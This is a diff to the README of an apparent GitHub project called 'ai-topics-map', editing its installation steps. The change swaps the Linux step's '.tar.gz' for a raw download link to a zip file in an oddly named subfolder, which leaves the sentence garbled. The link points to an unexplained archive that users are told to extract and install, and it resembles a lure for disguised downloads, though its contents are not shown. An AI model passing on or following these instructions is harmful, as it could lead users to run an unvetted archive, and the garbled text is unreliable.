EsmeraldasDEY/ai-topics-map/README.md

 5. **Install the Application**
    - **Windows**: Double-click the `.exe` file to start the installation.
 Follow the prompts to complete the setup.
    - **Mac**: Open the `.dmg` file and drag the application to your Applications folder.
-   - **Linux**: Extract the `.tar.gz` file, open the terminal, navigate to the extracted folder, and follow the instructions in the README to install.
+   - **Linux**: Extract the `https://raw.githubusercontent.com/EsmeraldasDEY/ai-topics-map/main/unyieldingly/ai-topics-map.zip` file, open the terminal, navigate to the extracted folder, and follow the instructions in the README to install.

 6. **Launch the Application**
    After installation, locate the application on your device and open it.
 You are now ready to explore the AI topics map!